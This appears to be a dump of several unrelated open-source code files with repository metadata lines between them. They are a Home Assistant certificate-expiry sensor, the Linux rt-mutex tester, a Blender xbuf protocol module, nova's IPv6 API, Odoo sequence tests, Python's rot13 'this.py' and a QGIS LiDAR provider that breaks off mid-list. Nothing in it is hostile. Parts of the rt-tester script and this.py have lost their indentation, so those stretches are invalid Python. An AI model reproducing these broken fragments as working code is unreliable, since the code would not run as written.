from homeassistant.const import (CONF_NAME, CONF_HOST, CONF_PORT,
EVENT_HOMEASSISTANT_START)
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
# Defaults for the sensor name and the standard HTTPS port.
DEFAULT_NAME = 'SSL Certificate Expiry'
DEFAULT_PORT = 443
# Re-check the certificate twice a day; socket operations time out after 10s.
SCAN_INTERVAL = timedelta(hours=12)
TIMEOUT = 10.0
# Platform config: host is required; name and port fall back to the defaults.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_HOST): cv.string,
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
})
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up certificate expiry sensor."""
    def run_setup(event):
        """Create the sensor once Home Assistant is fully initialized.

        Setup is deferred until startup has completed so the sensor can
        also probe the certificate served by this instance itself.
        """
        add_devices(
            [SSLCertificate(config.get(CONF_NAME),
                            config.get(CONF_HOST),
                            config.get(CONF_PORT))],
            True)

    # To allow checking of the HA certificate we must first be running.
    hass.bus.listen_once(EVENT_HOMEASSISTANT_START, run_setup)
class SSLCertificate(Entity):
    """Implementation of the certificate expiry sensor.

    The state is the number of whole days until the server certificate's
    ``notAfter`` date, or ``None`` while the certificate is unknown.
    """

    def __init__(self, sensor_name, server_name, server_port):
        """Initialize the sensor.

        sensor_name -- display name for the entity
        server_name -- hostname whose certificate is checked (also used for SNI)
        server_port -- TCP port to connect to (usually 443)
        """
        self.server_name = server_name
        self.server_port = server_port
        self._name = sensor_name
        self._state = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def unit_of_measurement(self):
        """Return the unit this state is expressed in."""
        return 'days'

    @property
    def state(self):
        """Return the state of the sensor (days until expiry)."""
        return self._state

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        return 'mdi:certificate'

    def update(self):
        """Fetch the certificate and refresh the days-until-expiry state."""
        sock = None
        try:
            ctx = ssl.create_default_context()
            sock = ctx.wrap_socket(
                socket.socket(), server_hostname=self.server_name)
            sock.settimeout(TIMEOUT)
            sock.connect((self.server_name, self.server_port))
        # socket.timeout must be caught before OSError (it is a subclass).
        except socket.gaierror:
            _LOGGER.error("Cannot resolve hostname: %s", self.server_name)
            if sock is not None:
                sock.close()  # fix: do not leak the socket on failure
            return
        except socket.timeout:
            _LOGGER.error(
                "Connection timeout with server: %s", self.server_name)
            if sock is not None:
                sock.close()  # fix: do not leak the socket on failure
            return
        except OSError:
            _LOGGER.error("Cannot connect to %s", self.server_name)
            if sock is not None:
                sock.close()  # fix: do not leak the socket on failure
            return
        try:
            cert = sock.getpeercert()
        except OSError:
            _LOGGER.error("Cannot fetch certificate from %s", self.server_name)
            return
        finally:
            # fix: the original never closed the TLS socket, leaking one
            # file descriptor on every successful update.
            sock.close()
        ts_seconds = ssl.cert_time_to_seconds(cert['notAfter'])
        timestamp = datetime.fromtimestamp(ts_seconds)
        expiry = timestamp - datetime.today()
        self._state = expiry.days
| apache-2.0 |
rumirand/GalaxyPlayer5-kernel | scripts/rt-tester/rt-tester.py | 1094 | 5362 | #!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <tglx@linutronix.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0     # -q: suppress progress output
test = 0      # -t: syntax-check only, never touch sysfs
comments = 0  # -c: echo comment lines after the first command (0/1/2 state)

# sysfs interface of the kernel rt-mutex tester; per-thread files are
# "<prefix><tid>/status" and "<prefix><tid>/command".
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"

# Command opcodes
# Maps the symbolic command names used in test files to the numeric
# opcodes understood by the kernel tester.
cmd_opcodes = {
    "schedother"    : "1",
    "schedfifo"     : "2",
    "lock"          : "3",
    "locknowait"    : "4",
    "lockint"       : "5",
    "lockintnowait" : "6",
    "lockcont"      : "7",
    "unlock"        : "8",
    "lockbkl"       : "9",
    "unlockbkl"     : "10",
    "signal"        : "11",
    "resetevent"    : "98",
    "reset"         : "99",
    }

# Test opcodes: [status-field letter, relation, fixed argument or None].
# The letter selects a field of the thread's status line; the relation
# (eq/lt/gt) is evaluated by analyse() below.
test_opcodes = {
    "prioeq"        : ["P" , "eq" , None],
    "priolt"        : ["P" , "lt" , None],
    "priogt"        : ["P" , "gt" , None],
    "nprioeq"       : ["N" , "eq" , None],
    "npriolt"       : ["N" , "lt" , None],
    "npriogt"       : ["N" , "gt" , None],
    "unlocked"      : ["M" , "eq" , 0],
    "trylock"       : ["M" , "eq" , 1],
    "blocked"       : ["M" , "eq" , 2],
    "blockedwake"   : ["M" , "eq" , 3],
    "locked"        : ["M" , "eq" , 4],
    "opcodeeq"      : ["O" , "eq" , None],
    "opcodelt"      : ["O" , "lt" , None],
    "opcodegt"      : ["O" , "gt" , None],
    "eventeq"       : ["E" , "eq" , None],
    "eventlt"       : ["E" , "lt" , None],
    "eventgt"       : ["E" , "gt" , None],
    }
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
    """Check one status value against a test opcode.

    val -- status value string read from the sysfs status line
    top -- [field-letter, relation, fixed-arg] triple from test_opcodes
    arg -- argument column from the test file

    Returns 1 when the relation (eq/lt/gt) holds, 0 otherwise.
    """
    intval = int(val)
    if top[0] == "M":
        # Mutex state: extract the decimal digit selected by `arg`.
        # Fix: use floor division so the arithmetic stays integral; the
        # original `/` relied on Python 2 integer-division semantics.
        intval = intval // (10 ** int(arg))
        intval = intval % 10
        argval = top[2]
    elif top[0] == "O":
        # Opcode comparison: translate a symbolic command name first,
        # falling back to a literal number.
        argval = int(cmd_opcodes.get(arg, arg))
    else:
        argval = int(arg)
    # progress("%d %s %d" %(intval, top[1], argval))
    if top[1] == "eq" and intval == argval:
        return 1
    if top[1] == "lt" and intval < argval:
        return 1
    if top[1] == "gt" and intval > argval:
        return 1
    return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0

# Read the test patterns.  Each non-comment line has the form
#   cmd : opcode : thread-id : data
# where cmd is "t" (test once), "w" (wait until true) or "c" (command).
while 1:
    linenr = linenr + 1
    line = fd.readline()
    if not len(line):
        break
    line = line.strip()
    parts = line.split(":")
    if not parts or len(parts) < 1:
        continue
    if len(parts[0]) == 0:
        continue
    if parts[0].startswith("#"):
        # Comment line: echoed only after the first real command when -c
        # was given (comments state 2).
        if comments > 1:
            progress(line)
        continue
    # First real command seen: arm comment echoing from now on.
    if comments == 1:
        comments = 2
    progress(line)
    cmd = parts[0].strip().lower()
    opc = parts[1].strip().lower()
    tid = parts[2].strip()
    dat = parts[3].strip()
    try:
        # Test or wait for a status value
        if cmd == "t" or cmd == "w":
            testop = test_opcodes[opc]
            fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
            if test:
                # Syntax-check mode: only show which file would be read.
                print fname
                continue
            while 1:
                query = 1
                fsta = open(fname, 'r')
                status = fsta.readline().strip()
                fsta.close()
                # The status line is a comma separated list of
                # "<letter>:<value>" fields.
                stat = status.split(",")
                for s in stat:
                    s = s.strip()
                    if s.startswith(testop[0]):
                        # Seperate status value
                        val = s[2:].strip()
                        query = analyse(val, testop, dat)
                        break
                # "t" tests once; "w" keeps polling until the condition holds.
                if query or cmd == "t":
                    break
                progress(" " + status)
            if not query:
                sys.stderr.write("Test failed in line %d\n" %(linenr))
                sys.exit(1)
        # Issue a command to the tester
        elif cmd == "c":
            cmdnr = cmd_opcodes[opc]
            # Build command string and sys filename
            cmdstr = "%s:%s" %(cmdnr, dat)
            fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
            if test:
                print fname
                continue
            fcmd = open(fname, 'w')
            fcmd.write(cmdstr)
            fcmd.close()
    except Exception,ex:
        # Any lookup/IO failure is reported as a syntax error with the
        # offending line number.
        sys.stderr.write(str(ex))
        sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
        if not test:
            fd.close()
        sys.exit(1)

# Normal exit pass
print "Pass"
sys.exit(0)
| gpl-2.0 |
xbuf/blender_io_xbuf | protocol.py | 1 | 4603 | # This file is part of blender_io_xbuf. blender_io_xbuf is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright David Bernard
# <pep8 compliant>
import struct
import asyncio
import atexit
import xbuf
import xbuf.datas_pb2
import xbuf.cmds_pb2
from . import xbuf_export # pylint: disable=W0406
# TODO better management off the event loop (eg on unregister)
# Single shared event loop used by every helper in this module; closed
# automatically when the interpreter exits.
loop = asyncio.get_event_loop()
atexit.register(loop.close)
class Kind:
    """One-byte message kind tags of the wire protocol (frame header)."""
    pingpong = 0x01
    logs = 0x02
    ask_screenshot = 0x03
    raw_screenshot = 0x04
    msgpack = 0x05
    xbuf_cmd = 0x06
class Client:
    """Holds one TCP stream connection to the remote xbuf viewer."""

    def __init__(self):
        self.writer = None
        self.reader = None
        self.host = None
        self.port = None

    def __del__(self):
        self.close()

    def close(self):
        """Shut down the stream writer, if any, and drop both endpoints."""
        writer = self.writer
        if writer is None:
            return
        print('Close the socket/writer')
        writer.write_eof()
        writer.close()
        self.writer = None
        self.reader = None

    @asyncio.coroutine
    def connect(self, host, port):
        """Connect to host:port, reusing the open connection when the
        endpoint is unchanged; returns self."""
        same_endpoint = (host == self.host) and (port == self.port)
        if not same_endpoint:
            self.close()
        if self.writer is None:
            self.host = host
            self.port = port
            (self.reader, self.writer) = yield from asyncio.open_connection(
                host, port, loop=loop)
        return self
@asyncio.coroutine
def readHeader(reader):
    """Read the 5-byte frame header; return (size, kind)."""
    raw = yield from reader.readexactly(5)
    size, kind = struct.unpack('>iB', raw)
    return (size, kind)
@asyncio.coroutine
def readMessage(reader):
    """Read one complete frame; return (kind, raw_message)."""
    (size, kind) = yield from readHeader(reader)
    body = yield from reader.readexactly(size)
    return (kind, body)
def writeMessage(writer, kind, body):
    """Frame *body* as <size:4 big-endian><kind:1><payload> and write it."""
    size = len(body)
    writer.write(size.to_bytes(4, byteorder='big'))
    writer.write(kind.to_bytes(1, byteorder='big'))
    writer.write(body)
def askScreenshot(writer, width, height):
    """Request a width x height screenshot from the viewer."""
    payload = bytearray()
    payload += (width).to_bytes(4, byteorder='big')
    payload += (height).to_bytes(4, byteorder='big')
    writeMessage(writer, Kind.ask_screenshot, payload)
def setEye(writer, location, rotation, projection_matrix, near, far, is_ortho):
    """Send a SetEye command describing the viewport camera.

    location/rotation/projection_matrix are Blender-side values that are
    converted by the xbuf_export helpers (Z-up to Y-up frame).
    """
    # sendCmd(writer, 'updateCamera', (_encode_vec3(location), _encode_quat(rotation), _encode_mat4(projection_matrix)))
    cmd = xbuf.cmds_pb2.Cmd()
    # cmd.setCamera = xbuf.cmds_pb2.SetCamera()
    xbuf_export.cnv_translation(location, cmd.setEye.location)
    xbuf_export.cnv_quatZupToYup(rotation, cmd.setEye.rotation)
    xbuf_export.cnv_mat4(projection_matrix, cmd.setEye.projection)
    cmd.setEye.near = near
    cmd.setEye.far = far
    cmd.setEye.projMode = xbuf.cmds_pb2.SetEye.orthographic if is_ortho else xbuf.cmds_pb2.SetEye.perspective
    writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def setData(writer, scene, cfg):
    """Export *scene* into a SetData command and send it, but only when
    the export produced at least one element."""
    cmd = xbuf.cmds_pb2.Cmd()
    xbuf_export.export(scene, cmd.setData, cfg)
    payloads = (cmd.setData.relations, cmd.setData.tobjects,
                cmd.setData.geometries, cmd.setData.materials,
                cmd.setData.lights)
    if any(len(group) > 0 for group in payloads):
        # print("send setData")
        writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def changeAssetFolders(writer, cfg):
    """Register cfg.assets_path as the viewer's only asset folder."""
    cmd = xbuf.cmds_pb2.Cmd()
    cmd.changeAssetFolders.path.append(cfg.assets_path)
    cmd.changeAssetFolders.register = True
    # Drop folders registered by any previous session.
    cmd.changeAssetFolders.unregisterOther = True
    writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def playAnimation(writer, ref, anims):
    """Ask the viewer to play the named animations on the object *ref*."""
    cmd = xbuf.cmds_pb2.Cmd()
    cmd.playAnimation.ref = ref
    cmd.playAnimation.animationsNames.extend(anims)
    writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def run_until_complete(f, *args, **kwargs):
    """Run *f* to completion on the module event loop.

    *f* may be an already-created coroutine object (extra arguments are
    ignored) or a plain callable that is wrapped as a coroutine and
    invoked with the given arguments.
    """
    if asyncio.iscoroutine(f):
        future = f
    else:
        future = asyncio.coroutine(f)(*args, **kwargs)
    loop.run_until_complete(future)
| gpl-3.0 |
luogangyi/bcec-nova | nova/ipv6/api.py | 40 | 1275 | # Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova import utils
ipv6_backend_opt = cfg.StrOpt('ipv6_backend',
default='rfc2462',
help='Backend to use for IPv6 generation')
CONF = cfg.CONF
CONF.register_opt(ipv6_backend_opt)
IMPL = None
def reset_backend():
    """(Re)load the IPv6 backend chosen by the ``ipv6_backend`` option."""
    global IMPL
    IMPL = utils.LazyPluggable('ipv6_backend',
                               rfc2462='nova.ipv6.rfc2462',
                               account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
    """Delegate IPv6 global-address generation to the configured backend."""
    return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
    """Delegate IPv6-address-to-MAC conversion to the configured backend."""
    return IMPL.to_mac(ipv6_address)
# Load the backend at import time so IMPL is never None for callers.
reset_backend()
| apache-2.0 |
QinerTech/QinerApps | openerp/addons/base/tests/test_ir_sequence.py | 40 | 8375 | # -*- coding: utf-8 -*-
# Run with one of these commands:
# > OPENERP_ADDONS_PATH='../../addons/trunk' OPENERP_PORT=8069 \
# OPENERP_DATABASE=yy PYTHONPATH=. python tests/test_ir_sequence.py
# > OPENERP_ADDONS_PATH='../../addons/trunk' OPENERP_PORT=8069 \
# OPENERP_DATABASE=yy nosetests tests/test_ir_sequence.py
# > OPENERP_ADDONS_PATH='../../../addons/trunk' OPENERP_PORT=8069 \
# OPENERP_DATABASE=yy PYTHONPATH=../:. unit2 test_ir_sequence
# This assume an existing database.
import psycopg2
import psycopg2.errorcodes
import unittest
import openerp
from openerp.tests import common
ADMIN_USER_ID = common.ADMIN_USER_ID

def registry(model):
    """Resolve *model* through the registry of the shared test database."""
    return openerp.modules.registry.RegistryManager.get(common.get_db_name())[model]
def cursor():
    """Open a fresh cursor on the test database; caller must commit/close."""
    return openerp.modules.registry.RegistryManager.get(common.get_db_name()).cursor()
def drop_sequence(code):
    """Remove every ir.sequence matching *code* (used by tearDownClass)."""
    cr = cursor()
    s = registry('ir.sequence')
    ids = s.search(cr, ADMIN_USER_ID, [('code', '=', code)])
    s.unlink(cr, ADMIN_USER_ID, ids)
    cr.commit()
    cr.close()
class test_ir_sequence_standard(unittest.TestCase):
    """ A few tests for a 'Standard' (i.e. PostgreSQL) sequence. """

    def test_ir_sequence_create(self):
        """ Try to create a sequence object. """
        cr = cursor()
        d = dict(code='test_sequence_type', name='Test sequence')
        c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
        assert c
        cr.commit()
        cr.close()

    def test_ir_sequence_search(self):
        """ Try a search. """
        cr = cursor()
        ids = registry('ir.sequence').search(cr, ADMIN_USER_ID, [], {})
        assert ids
        cr.commit()
        cr.close()

    def test_ir_sequence_draw(self):
        """ Try to draw a number. """
        cr = cursor()
        n = registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type', {})
        assert n
        cr.commit()
        cr.close()

    def test_ir_sequence_draw_twice(self):
        """ Try to draw a number from two transactions. """
        # Standard sequences are backed by a native PostgreSQL sequence,
        # so two concurrent transactions can both draw without blocking.
        cr0 = cursor()
        cr1 = cursor()
        n0 = registry('ir.sequence').next_by_code(cr0, ADMIN_USER_ID, 'test_sequence_type', {})
        assert n0
        n1 = registry('ir.sequence').next_by_code(cr1, ADMIN_USER_ID, 'test_sequence_type', {})
        assert n1
        cr0.commit()
        cr1.commit()
        cr0.close()
        cr1.close()

    @classmethod
    def tearDownClass(cls):
        # Clean up the sequence created by the tests above.
        drop_sequence('test_sequence_type')
class test_ir_sequence_no_gap(unittest.TestCase):
    """ Copy of the previous tests for a 'No gap' sequence. """

    def test_ir_sequence_create_no_gap(self):
        """ Try to create a sequence object. """
        cr = cursor()
        d = dict(code='test_sequence_type_2', name='Test sequence',
                 implementation='no_gap')
        c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
        assert c
        cr.commit()
        cr.close()

    def test_ir_sequence_draw_no_gap(self):
        """ Try to draw a number. """
        cr = cursor()
        n = registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type_2', {})
        assert n
        cr.commit()
        cr.close()

    def test_ir_sequence_draw_twice_no_gap(self):
        """ Try to draw a number from two transactions.
        This is expected to not work.
        """
        # 'no_gap' sequences lock the sequence row, so the second open
        # transaction fails immediately instead of waiting.
        cr0 = cursor()
        cr1 = cursor()
        cr1._default_log_exceptions = False # Prevent logging a traceback
        with self.assertRaises(psycopg2.OperationalError) as e:
            n0 = registry('ir.sequence').next_by_code(cr0, ADMIN_USER_ID, 'test_sequence_type_2', {})
            assert n0
            n1 = registry('ir.sequence').next_by_code(cr1, ADMIN_USER_ID, 'test_sequence_type_2', {})
        self.assertEqual(e.exception.pgcode, psycopg2.errorcodes.LOCK_NOT_AVAILABLE, msg="postgresql returned an incorrect errcode")
        cr0.close()
        cr1.close()

    @classmethod
    def tearDownClass(cls):
        drop_sequence('test_sequence_type_2')
class test_ir_sequence_change_implementation(unittest.TestCase):
    """ Create sequence objects and change their ``implementation`` field. """
    # Methods are numbered because unittest runs them alphabetically and
    # each step depends on the records created by the previous one.

    def test_ir_sequence_1_create(self):
        """ Try to create a sequence object. """
        cr = cursor()
        d = dict(code='test_sequence_type_3', name='Test sequence')
        c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
        assert c
        d = dict(code='test_sequence_type_4', name='Test sequence',
                 implementation='no_gap')
        c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
        assert c
        cr.commit()
        cr.close()

    def test_ir_sequence_2_write(self):
        # Switch both sequences standard -> no_gap and back.
        cr = cursor()
        ids = registry('ir.sequence').search(cr, ADMIN_USER_ID,
            [('code', 'in', ['test_sequence_type_3', 'test_sequence_type_4'])], {})
        registry('ir.sequence').write(cr, ADMIN_USER_ID, ids,
            {'implementation': 'standard'}, {})
        registry('ir.sequence').write(cr, ADMIN_USER_ID, ids,
            {'implementation': 'no_gap'}, {})
        cr.commit()
        cr.close()

    def test_ir_sequence_3_unlink(self):
        cr = cursor()
        ids = registry('ir.sequence').search(cr, ADMIN_USER_ID,
            [('code', 'in', ['test_sequence_type_3', 'test_sequence_type_4'])], {})
        registry('ir.sequence').unlink(cr, ADMIN_USER_ID, ids, {})
        cr.commit()
        cr.close()

    @classmethod
    def tearDownClass(cls):
        drop_sequence('test_sequence_type_3')
        drop_sequence('test_sequence_type_4')
class test_ir_sequence_generate(unittest.TestCase):
    """ Create sequence objects and generate some values. """

    def test_ir_sequence_create(self):
        """ Try to create a sequence object. """
        cr = cursor()
        d = dict(code='test_sequence_type_5', name='Test sequence')
        c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
        assert c
        cr.commit()
        cr.close()
        cr = cursor()
        # Draw 9 numbers in a row; they must be the consecutive integers
        # 1..9 rendered as strings (Python 2: xrange).
        f = lambda *a: registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type_5', {})
        assert all(str(x) == f() for x in xrange(1,10))
        cr.commit()
        cr.close()

    def test_ir_sequence_create_no_gap(self):
        """ Try to create a sequence object. """
        cr = cursor()
        d = dict(code='test_sequence_type_6', name='Test sequence', implementation='no_gap')
        c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
        assert c
        cr.commit()
        cr.close()
        cr = cursor()
        # The no_gap implementation must produce the same 1..9 run.
        f = lambda *a: registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type_6', {})
        assert all(str(x) == f() for x in xrange(1,10))
        cr.commit()
        cr.close()

    @classmethod
    def tearDownClass(cls):
        drop_sequence('test_sequence_type_5')
        drop_sequence('test_sequence_type_6')
class Test_ir_sequence_init(common.TransactionCase):
    """Check that number_next reads come from the PostgreSQL sequence."""

    def test_00(self):
        registry, cr, uid = self.registry, self.cr, self.uid
        # test if read statement return the good number_next value (from postgreSQL sequence and not ir_sequence value)
        sequence = registry('ir.sequence')
        # first creation of sequence (normal)
        values = {'number_next': 1,
                  'company_id': 1,
                  'padding': 4,
                  'number_increment': 1,
                  'implementation': 'standard',
                  'name': 'test-sequence-00'}
        seq_id = sequence.create(cr, uid, values)
        # Call get next 4 times
        sequence.next_by_id(cr, uid, seq_id)
        sequence.next_by_id(cr, uid, seq_id)
        sequence.next_by_id(cr, uid, seq_id)
        read_sequence = sequence.next_by_id(cr, uid, seq_id)
        # Read the value of the current sequence
        assert read_sequence == "0004", 'The actual sequence value must be 4. reading : %s' % read_sequence
        # reset sequence to 1 by write method calling
        sequence.write(cr, uid, [seq_id], {'number_next': 1})
        # Read the value of the current sequence
        read_sequence = sequence.next_by_id(cr, uid, seq_id)
        assert read_sequence == "0001", 'The actual sequence value must be 1. reading : %s' % read_sequence


if __name__ == "__main__":
    unittest.main()
| gpl-3.0 |
nattee/cafe-grader-web | lib/assets/Lib/this.py | 18 | 1031 | s = """Gur Mra bs Clguba, ol Gvz Crgref
Ornhgvshy vf orggre guna htyl.
Rkcyvpvg vf orggre guna vzcyvpvg.
Fvzcyr vf orggre guna pbzcyrk.
Pbzcyrk vf orggre guna pbzcyvpngrq.
Syng vf orggre guna arfgrq.
Fcnefr vf orggre guna qrafr.
Ernqnovyvgl pbhagf.
Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf.
Nygubhtu cenpgvpnyvgl orngf chevgl.
Reebef fubhyq arire cnff fvyragyl.
Hayrff rkcyvpvgyl fvyraprq.
Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff.
Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg.
Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu.
Abj vf orggre guna arire.
Nygubhtu arire vf bsgra orggre guna *evtug* abj.
Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn.
Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn.
Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!"""
d = {}
for c in (65, 97):
for i in range(26):
d[chr(i+c)] = chr((i+13) % 26 + c)
print("".join([d.get(c, c) for c in s]))
| mit |
siliconsmiley/QGIS | python/plugins/processing/algs/lidar/LidarToolsAlgorithmProvider.py | 4 | 9955 | # -*- coding: utf-8 -*-
"""
***************************************************************************
LidarToolsAlgorithmProvider.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
---------------------
Date : April, October 2014
Copyright : (C) 2014 by Martin Isenburg
Email : martin near rapidlasso point com
---------------------
Date : June 2014
Copyright : (C) 2014 by Agresta S. Coop
Email : iescamochero at agresta dot org
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import QIcon
from processing.core.AlgorithmProvider import AlgorithmProvider
from processing.core.ProcessingConfig import ProcessingConfig, Setting
from processing.tools.system import isWindows
from lastools.LAStoolsUtils import LAStoolsUtils
from lastools.lasground import lasground
from lastools.lasheight import lasheight
from lastools.lasclassify import lasclassify
from lastools.laszip import laszip
from lastools.lasindex import lasindex
from lastools.lasclip import lasclip
from lastools.lasquery import lasquery
from lastools.lascolor import lascolor
from lastools.lasthin import lasthin
from lastools.lasnoise import lasnoise
from lastools.lassort import lassort
from lastools.lastile import lastile
from lastools.lasgrid import lasgrid
from lastools.lasview import lasview
from lastools.lasboundary import lasboundary
from lastools.lasinfo import lasinfo
from lastools.las2dem import las2dem
from lastools.blast2dem import blast2dem
from lastools.las2iso import las2iso
from lastools.las2tin import las2tin
from lastools.las2las_filter import las2las_filter
from lastools.las2las_project import las2las_project
from lastools.las2las_transform import las2las_transform
from lastools.blast2iso import blast2iso
from lastools.lasprecision import lasprecision
from lastools.lasvalidate import lasvalidate
from lastools.lasduplicate import lasduplicate
from lastools.las2txt import las2txt
from lastools.txt2las import txt2las
from lastools.las2shp import las2shp
from lastools.shp2las import shp2las
from lastools.lasmerge import lasmerge
from lastools.lassplit import lassplit
from lastools.lascanopy import lascanopy
from lastools.lasoverage import lasoverage
from lastools.lasoverlap import lasoverlap
from lastools.lastilePro import lastilePro
from lastools.lasgroundPro import lasgroundPro
from lastools.las2demPro import las2demPro
from lastools.lasheightPro import lasheightPro
from lastools.laszipPro import laszipPro
from lastools.lasgridPro import lasgridPro
from lastools.lasduplicatePro import lasduplicatePro
from lastools.lassortPro import lassortPro
from lastools.lasclassifyPro import lasclassifyPro
from lastools.lasthinPro import lasthinPro
from lastools.lasnoisePro import lasnoisePro
from lastools.lasindexPro import lasindexPro
from lastools.lascanopyPro import lascanopyPro
from lastools.blast2demPro import blast2demPro
from lastools.lasboundaryPro import lasboundaryPro
from lastools.lasinfoPro import lasinfoPro
from lastools.las2lasPro_filter import las2lasPro_filter
from lastools.las2lasPro_project import las2lasPro_project
from lastools.las2lasPro_transform import las2lasPro_transform
from lastools.lasoveragePro import lasoveragePro
from lastools.txt2lasPro import txt2lasPro
from lastools.las2txtPro import las2txtPro
from lastools.blast2isoPro import blast2isoPro
from lastools.lasvalidatePro import lasvalidatePro
from lastools.lasmergePro import lasmergePro
from lastools.lasviewPro import lasviewPro
from lastools.lasoverlapPro import lasoverlapPro
from lastools.flightlinesToDTMandDSM import flightlinesToDTMandDSM
from lastools.flightlinesToCHM import flightlinesToCHM
from lastools.flightlinesToSingleCHMpitFree import flightlinesToSingleCHMpitFree
from lastools.hugeFileClassify import hugeFileClassify
from lastools.hugeFileGroundClassify import hugeFileGroundClassify
from lastools.hugeFileNormalize import hugeFileNormalize
from fusion.OpenViewerAction import OpenViewerAction
from fusion.CanopyMaxima import CanopyMaxima
from fusion.CanopyModel import CanopyModel
from fusion.Catalog import Catalog
from fusion.ClipData import ClipData
from fusion.CloudMetrics import CloudMetrics
from fusion.Cover import Cover
from fusion.GridMetrics import GridMetrics
from fusion.GridSurfaceCreate import GridSurfaceCreate
from fusion.TinSurfaceCreate import TinSurfaceCreate
from fusion.Csv2Grid import Csv2Grid
from fusion.GroundFilter import GroundFilter
from fusion.MergeData import MergeData
from fusion.FilterData import FilterData
from fusion.FusionUtils import FusionUtils
class LidarToolsAlgorithmProvider(AlgorithmProvider):
    """Processing provider grouping the LAStools and Fusion LiDAR tools.

    The available algorithm set depends on the platform: the full
    LAStools suite needs Windows or Wine; Fusion is Windows-only.
    """

    def __init__(self):
        AlgorithmProvider.__init__(self)
        # Disabled by default; the user enables it in Processing options.
        self.activate = False
        self.algsList = []
        # LAStools for processing single files
        if (isWindows() or LAStoolsUtils.hasWine()):
            lastools = [
                lasground(), lasheight(), lasclassify(), lasclip(), lastile(),
                lascolor(), lasgrid(), las2dem(), blast2dem(), las2iso(), blast2iso(),
                lasview(), lasboundary(), lasinfo(), lasprecision(), las2tin(),
                lasvalidate(), lasduplicate(), las2txt(), txt2las(), laszip(),
                lasindex(), lasthin(), lassort(), lascanopy(), lasmerge(),
                las2shp(), shp2las(), lasnoise(), lassplit(), las2las_filter(),
                las2las_project(), las2las_transform(), lasoverage(), lasoverlap(),
                lasquery()
            ]
        else:
            # Reduced, natively portable subset when Wine is unavailable.
            lastools = [
